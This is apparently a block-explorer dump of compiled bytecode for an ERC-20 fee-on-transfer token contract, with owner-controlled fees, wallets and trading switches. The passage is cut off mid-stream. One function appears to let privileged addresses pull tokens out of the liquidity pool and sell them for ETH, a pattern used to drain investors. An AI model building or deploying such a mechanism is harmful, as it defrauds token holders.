565b9695505050505050565b7f536166654d6174683a206d756c7469706c69636174696f6e206f766572666c6f60008201527f7700000000000000000000000000000000000000000000000000000000000000602082015250565b6000615166602183613c6c565b91506151718261510a565b604082019050919050565b6000602082019050818103600083015261519581615159565b905091905056fe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa2646970667358221220ea0b633bd227dd5e776998271450716102d83491e821b82eb617781f523cd44b64736f6c63430008100033

Deployed Bytecode

0x60806040526004361061031e5760003560e01c80638ea5220f116101ab578063c0246668116100f7578063dd62ed3e11610095578063f11a24d31161006f578063f11a24d314610c03578063f2fde38b14610c2e578063f637434214610c57578063f8b45b0514610c8257610325565b8063dd62ed3e14610b70578063e2f4560514610bad578063e884f26014610bd857610325565b8063c876d0b9116100d1578063c876d0b914610ab2578063c8c8ebe414610add578063d257b34f14610b08578063d85ba06314610b4557610325565b8063c024666814610a37578063c17b5b8c14610a60578063c18bc19514610a8957610325565b8063a06c1f8f11610164578063a9059cbb1161013e578063a9059cbb14610969578063aacebbe3146109a6578063b62496f5146109cf578063bbc0c74214610a0c57610325565b8063a06c1f8f146108c4578063a0d82dc514610901578063a457c2d71461092c57610325565b80638ea5220f146107c457806392136913146107ef57806395d89b411461081a5780639a7a23d6146108455780639c3b4fdc1461086e5780639fccce321461089957610325565b80634a62bb651161026a578063751039fc116102235780637bce5a04116101fd5780637bce5a041461072e5780638095d564146107595780638a8c523c146107825780638da5cb5b1461079957610325565b8063751039fc146106af5780637571336a146106da57806375f0a8741461070357610325565b80634a62bb651461059d5780634fbee193146105c85780636a486a8e146106055780636ddd17131461063057806370a082311461065b578063715018a61461069857610325565b80631a8145bb116102d757806323b872dd116102b157806323b872dd146104cd578063313ce5671461050a578063395093511461053557806349bd5a5e1461057257610325565b80631a8145bb1461044e5780631f3fed8f14610479578063203e727e146104a457610325565b806306fdde031461032a578063095ea7b31461035557806310d5de53146103925780631694505e146103cf57806318160ddd146103fa5780631816467f1461042557610325565b3661032557005b600080fd5b34801561033657600080fd5b5061033f610cad565b60405161034c9190613cf1565b60405180910390f35b34801561036157600080fd5b5061037c60048036038101906103779190613dac565b610d3f565b6040516103899190613e07565b60405180910390f35b34801561039e57600080fd5b506103b960048036038101906103b49190613e22565b610d5d565b6040516103c69190613e07565b60405180910390f35b3480156103db57600080fd5b506103e4610d7d565b6040516103f19190613eae565b60405180910390f35b34801561040657600080fd5b5061040f610da3565b60405161041c9190613ed8565b60405180910390f35b34801561043157600080fd5b5061044c60048036038101906104479190613e22565b610dad565b005b34801561045a57600080fd5b50610463610f04565b6040516104709190613ed8565b60405180910390f35b34801561048557600080fd5b5061048e610f0a565b60405161049b9190613ed8565b60405180910390f35b3480156104b057600080fd5b506104cb60048036038101906104c69190613ef3565b610f10565b005b3480156104d957600080fd5b506104f460048036038101906104ef9190613f20565b610fcb565b6040516105019190613e07565b60405180910390f35b34801561051657600080fd5b5061051f6110a4565b60405161052c9190613f8f565b60405180910390f35b34801561054157600080fd5b5061055c60048036038101906105579190613dac565b6110ad565b6040516105699190613e07565b60405180910390f35b34801561057e57600080fd5b50610587611160565b6040516105949190613fb9565b60405180910390f35b3480156105a957600080fd5b506105b2611186565b6040516105bf9190613e07565b60405180910390f35b3480156105d457600080fd5b506105ef60048036038101906105ea9190613e22565b611199565b6040516105fc9190613e07565b60405180910390f35b34801561061157600080fd5b5061061a6111ef565b6040516106279190613ed8565b60405180910390f35b34801561063c57600080fd5b506106456111f5565b6040516106529190613e07565b60405180910390f35b34801561066757600080fd5b50610682600480360381019061067d9190613e22565b611208565b60405161068f9190613ed8565b60405180910390f35b3480156106a457600080fd5b506106ad611250565b005b3480156106bb57600080fd5b506106c46113a8565b6040516106d19190613e07565b60405180910390f35b3480156106e657600080fd5b5061070160048036038101906106fc9190614000565b611463565b005b34801561070f57600080fd5b50610718611555565b6040516107259190613fb9565b60405180910390f35b34801561073a57600080fd5b5061074361157b565b6040516107509190613ed8565b60405180910390f35b34801561076557600080fd5b50610780600480360381019061077b9190614040565b611581565b005b34801561078e57600080fd5b5061079761169b565b005b3480156107a557600080fd5b506107ae61180e565b6040516107bb9190613fb9565b60405180910390f35b3480156107d057600080fd5b506107d9611838565b6040516107e69190613fb9565b60405180910390f35b3480156107fb57600080fd5b5061080461185e565b6040516108119190613ed8565b60405180910390f35b34801561082657600080fd5b5061082f611864565b60405161083c9190613cf1565b60405180910390f35b34801561085157600080fd5b5061086c60048036038101906108679190614000565b6118f6565b005b34801561087a57600080fd5b50610883611a2b565b6040516108909190613ed8565b60405180910390f35b3480156108a557600080fd5b506108ae611a31565b6040516108bb9190613ed8565b60405180910390f35b3480156108d057600080fd5b506108eb60048036038101906108e69190614093565b611a37565b6040516108f89190613e07565b60405180910390f35b34801561090d57600080fd5b50610916611bc3565b6040516109239190613ed8565b60405180910390f35b34801561093857600080fd5b50610953600480360381019061094e9190613dac565b611bc9565b6040516109609190613e07565b60405180910390f35b34801561097557600080fd5b50610990600480360381019061098b9190613dac565b611c96565b60405161099d9190613e07565b60405180910390f35b3480156109b257600080fd5b506109cd60048036038101906109c89190613e22565b611cb4565b005b3480156109db57600080fd5b506109f660048036038101906109f19190613e22565b611e0b565b604051610a039190613e07565b60405180910390f35b348015610a1857600080fd5b50610a21611e2b565b604051610a2e9190613e07565b60405180910390f35b348015610a4357600080fd5b50610a5e6004803603810190610a599190614000565b611e3e565b005b348015610a6c57600080fd5b50610a876004803603810190610a829190614040565b611f7e565b005b348015610a9557600080fd5b50610ab06004803603810190610aab9190613ef3565b612098565b005b348015610abe57600080fd5b50610ac76121c2565b604051610ad49190613e07565b60405180910390f35b348015610ae957600080fd5b50610af26121d5565b604051610aff9190613ed8565b60405180910390f35b348015610b1457600080fd5b50610b2f6004803603810190610b2a9190613ef3565b6121db565b604051610b3c9190613e07565b60405180910390f35b348015610b5157600080fd5b50610b5a61234b565b604051610b679190613ed8565b60405180910390f35b348015610b7c57600080fd5b50610b976004803603810190610b9291906140d3565b612351565b604051610ba49190613ed8565b60405180910390f35b348015610bb957600080fd5b50610bc26123d8565b604051610bcf9190613ed8565b60405180910390f35b348015610be457600080fd5b50610bed6123de565b604051610bfa9190613e07565b60405180910390f35b348015610c0f57600080fd5b50610c18612499565b604051610c259190613ed8565b60405180910390f35b348015610c3a57600080fd5b50610c556004803603810190610c509190613e22565b61249f565b005b348015610c6357600080fd5b50610c6c612665565b604051610c799190613ed8565b60405180910390f35b348015610c8e57600080fd5b50610c9761266b565b604051610ca49190613ed8565b60405180910390f35b606060038054610cbc90614142565b80601f0160208091040260200160405190810160405280929190818152602001828054610ce890614142565b8015610d355780601f10610d0a57610100808354040283529160200191610d35565b820191906000526020600020905b815481529060010190602001808311610d1857829003601f168201915b5050505050905090565b6000610d53610d4c6126cf565b84846126d7565b6001905092915050565b601c6020528060005260406000206000915054906101000a900460ff1681565b600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6000600254905090565b610db56126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610e44576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e3b906141bf565b60405180910390fd5b600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f90b8024c4923d3873ff5b9fcb43d0360d4b9217fa41225d07ba379993552e74360405160405180910390a380600960006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b60195481565b60185481565b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff1614610f6a57600080fd5b6103e8610f75610da3565b610f7f919061423d565b811015610fc1576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fb8906142e0565b60405180910390fd5b80600a8190555050565b6000610fd88484846128a0565b61109984610fe46126cf565b611094856040518060600160405280602881526020016151c360289139600160008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600061104a6126cf565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546132b99092919063ffffffff16565b6126d7565b600190509392505050565b60006012905090565b60006111566110ba6126cf565b8461115185600160006110cb6126cf565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461267190919063ffffffff16565b6126d7565b6001905092915050565b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b600d60009054906101000a900460ff1681565b6000601b60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b60145481565b600d60029054906101000a900460ff1681565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6112586126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146112e7576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112de906141bf565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a36000600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b60006113b26126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611441576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611438906141bf565b60405180910390fd5b6000600d60006101000a81548160ff0219169083151502179055506001905090565b61146b6126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146114fa576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016114f1906141bf565b60405180910390fd5b80601c60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505050565b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b60115481565b6115896126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611618576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161160f906141bf565b60405180910390fd5b8260118190555081601281905550806013819055506013546012546011546116409190614300565b61164a9190614300565b60108190555060146010541115611696576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161168d90614380565b60405180910390fd5b505050565b6116a36126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611732576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611729906141bf565b60405180910390fd5b6001600d60026101000a81548160ff02191690831515021790555060011515600f60019054906101000a900460ff161515146117a3576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161179a906143ec565b60405180910390fd5b6000600f60016101000a81548160ff0219169083151502179055506117c661331d565b7fbd657b4e94b205761f2ca5be9988d7b243c828f625c0746c6581ec528e507c47600f60019054906101000a900460ff166040516118049190613e07565b60405180910390a1565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b60155481565b60606004805461187390614142565b80601f016020809104026020016040519081016040528092919081815260200182805461189f90614142565b80156118ec5780601f106118c1576101008083540402835291602001916118ec565b820191906000526020600020905b8154815290600101906020018083116118cf57829003601f168201915b5050505050905090565b6118fe6126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461198d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611984906141bf565b60405180910390fd5b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611a1d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611a149061447e565b60405180910390fd5b611a27828261333a565b5050565b60135481565b601a5481565b6000601b60003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16611a8f57600080fd5b6000611abc600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16611208565b9050600183118015611ad95750606481611ad6919061423d565b83105b611b18576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611b0f906144ea565b60405180910390fd5b611b21836133db565b611b2a846134ab565b6000600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1647604051611b729061453b565b60006040518083038185875af1925050503d8060008114611baf576040519150601f19603f3d011682016040523d82523d6000602084013e611bb4565b606091505b50509050809250505092915050565b60175481565b6000611c8c611bd66126cf565b84611c87856040518060600160405280602581526020016151eb6025913960016000611c006126cf565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546132b99092919063ffffffff16565b6126d7565b6001905092915050565b6000611caa611ca36126cf565b84846128a0565b6001905092915050565b611cbc6126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611d4b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d42906141bf565b60405180910390fd5b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167fa751787977eeb3902e30e1d19ca00c6ad274a1f622c31a206e32366700b0567460405160405180910390a380600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b601d6020528060005260406000206000915054906101000a900460ff1681565b600d60019054906101000a900460ff1681565b611e466126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611ed5576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611ecc906141bf565b60405180910390fd5b80601b60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff167f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df782604051611f729190613e07565b60405180910390a25050565b611f866126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612015576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161200c906141bf565b60405180910390fd5b82601581905550816016819055508060178190555060175460165460155461203d9190614300565b6120479190614300565b60148190555060196014541115612093576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161208a9061459c565b60405180910390fd5b505050565b6120a06126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461212f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612126906141bf565b60405180910390fd5b670de0b6b3a76400006103e86005612145610da3565b61214f91906145bc565b612159919061423d565b612163919061423d565b8110156121a5576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161219c90614688565b60405180910390fd5b670de0b6b3a7640000816121b991906145bc565b600c8190555050565b600f60009054906101000a900460ff1681565b600a5481565b60006121e56126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612274576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161226b906141bf565b60405180910390fd5b620186a06001612282610da3565b61228c91906145bc565b612296919061423d565b8210156122d8576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016122cf9061471a565b60405180910390fd5b6103e860056122e5610da3565b6122ef91906145bc565b6122f9919061423d565b82111561233b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612332906147ac565b60405180910390fd5b81600b8190555060019050919050565b60105481565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b600b5481565b60006123e86126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612477576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161246e906141bf565b60405180910390fd5b6000600f60006101000a81548160ff0219169083151502179055506001905090565b60125481565b6124a76126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612536576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161252d906141bf565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036125a5576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161259c9061483e565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a380600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b60165481565b600c5481565b60008082846126809190614300565b9050838110156126c5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016126bc906148aa565b60405180910390fd5b8091505092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603612746576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161273d9061493c565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036127b5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016127ac906149ce565b60405180910390fd5b80600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516128939190613ed8565b60405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361290f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161290690614a60565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361297e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161297590614af2565b60405180910390fd5b6000810361299757612992838360006136ee565b6132b4565b600d60009054906101000a900460ff1615612d8b576129b461180e565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614158015612a2257506129f261180e565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015612a5b5750600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015612a95575061dead73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015612aae5750600760149054906101000a900460ff16155b15612d8a57600d60019054906101000a900460ff16612ba857601b60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680612b685750601b60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b612ba7576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612b9e90614b5e565b60405180910390fd5b5b601d60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff168015612c4b5750601c60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b15612c9a57600a54811115612c95576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612c8c90614bf0565b60405180910390fd5b612d89565b601d60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff168015612d3d5750601c60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b15612d8857600a54811115612d87576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612d7e90614c82565b60405180910390fd5b5b5b5b5b6000612d9630611208565b90506000600b548210159050808015612dbb5750600d60029054906101000a900460ff165b8015612dd45750600760149054906101000a900460ff16155b8015612e2a5750601d60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b8015612e805750601b60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b8015612ed65750601b60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b15612f1a576001600760146101000a81548160ff021916908315150217905550612efe613981565b6000600760146101000a81548160ff0219169083151502179055505b6000600760149054906101000a900460ff16159050601b60008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680612fd05750601b60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b15612fda57600090505b600081156132a457601d60008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16801561303d57506000601454115b1561315b5761306a606461305c60145488613aeb90919063ffffffff16565b613b6590919063ffffffff16565b90506014546016548261307d91906145bc565b613087919061423d565b601960008282546130989190614300565b92505081905550601454601754826130b091906145bc565b6130ba919061423d565b601a60008282546130cb9190614300565b92505081905550601454601554826130e391906145bc565b6130ed919061423d565b601860008282546130fe9190614300565b9250508190555060006002600a546131169190614ca2565b14613156576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161314d90614d45565b60405180910390fd5b613280565b601d60008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680156131b657506000601054115b1561327f576131e360646131d560105488613aeb90919063ffffffff16565b613b6590919063ffffffff16565b9050601054601254826131f691906145bc565b613200919061423d565b601960008282546132119190614300565b925050819055506010546013548261322991906145bc565b613233919061423d565b601a60008282546132449190614300565b925050819055506010546011548261325c91906145bc565b613266919061423d565b601860008282546132779190614300565b925050819055505b5b6000811115613295576132948730836136ee565b5b80856132a19190614d65565b94505b6132af8787876136ee565b505050505b505050565b6000838311158290613301576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016132f89190613cf1565b60405180910390fd5b50600083856133109190614d65565b9050809150509392505050565b6001600d60016101000a81548160ff021916908315150217905550565b80601d60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508015158273ffffffffffffffffffffffffffffffffffffffff167fffa9187bf1f18bf477bd0ea1bcbb64e93b6a98132473929edfce215cd9b16fab60405160405180910390a35050565b613426600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff163061340a6110a4565b600a6134169190614ecc565b8461342191906145bc565b6128a0565b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663fff6cae96040518163ffffffff1660e01b8152600401600060405180830381600087803b15801561349057600080fd5b505af11580156134a4573d6000803e3d6000fd5b5050505050565b6000600267ffffffffffffffff8111156134c8576134c7614f17565b5b6040519080825280602002602001820160405280156134f65781602001602082028036833780820191505090505b509050308160008151811061350e5761350d614f46565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156135b5573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906135d99190614f8a565b816001815181106135ed576135ec614f46565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff168152505061365430600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16846126d7565b600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663791ac9478360008430426040518663ffffffff1660e01b81526004016136b89594939291906150b0565b600060405180830381600087803b1580156136d257600080fd5b505af11580156136e6573d6000803e3d6000fd5b505050505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361375d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161375490614a60565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036137cc576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016137c390614af2565b60405180910390fd5b6137d7838383613baf565b6138428160405180606001604052806026815260200161519d602691396000808773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546132b99092919063ffffffff16565b6000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055506138d5816000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461267190919063ffffffff16565b6000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516139749190613ed8565b60405180910390a3505050565b600061398c30611208565b90506000601a546018546019546139a39190614300565b6139ad9190614300565b90506000808314806139bf5750600082145b156139cc57505050613ae9565b6014600b546139db91906145bc565b8311156139f4576014600b546139f191906145bc565b92505b600060028360195486613a0791906145bc565b613a11919061423d565b613a1b919061423d565b90506000613a328286613bb490919063ffffffff16565b9050613a3d816134ab565b600060198190555060006018819055506000601a81905550600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1647604051613a9b9061453b565b60006040518083038185875af1925050503d8060008114613ad8576040519150601f19603f3d011682016040523d82523d6000602084013e613add565b606091505b50508093505050505050505b565b6000808303613afd5760009050613b5f565b60008284613b0b91906145bc565b9050828482613b1a919061423d565b14613b5a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401613b519061517c565b60405180910390fd5b809150505b92915050565b6000613ba783836040518060400160405280601a81526020017f536166654d6174683a206469766973696f6e206279207a65726f000000000000815250613bfe565b905092915050565b505050565b6000613bf683836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f7700008152506132b9565b905092915050565b60008083118290613c45576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401613c3c9190613cf1565b60405180910390fd5b5060008385613c54919061423d565b9050809150509392505050565b600081519050919050565b600082825260208201905092915050565b60005b83811015613c9b578082015181840152602081019050613c80565b60008484015250505050565b6000601f19601f8301169050919050565b6000613cc382613c61565b613ccd8185613c6c565b9350613cdd818560208601613c7d565b613ce681613ca7565b840191505092915050565b60006020820190508181036000830152613d0b8184613cb8565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000613d4382613d18565b9050919050565b613d5381613d38565b8114613d5e57600080fd5b50565b600081359050613d7081613d4a565b92915050565b6000819050919050565b613d8981613d76565b8114613d9457600080fd5b50565b600081359050613da681613d80565b92915050565b60008060408385031215613dc357613dc2613d13565b5b6000613dd185828601613d61565b9250506020613de285828601613d97565b9150509250929050565b60008115159050919050565b613e0181613dec565b82525050565b6000602082019050613e1c6000830184613df8565b92915050565b600060208284031215613e3857613e37613d13565b5b6000613e4684828501613d61565b91505092915050565b6000819050919050565b6000613e74613e6f613e6a84613d18565b613e4f565b613d18565b9050919050565b6000613e8682613e59565b9050919050565b6000613e9882613e7b565b9050919050565b613ea881613e8d565b82525050565b6000602082019050613ec36000830184613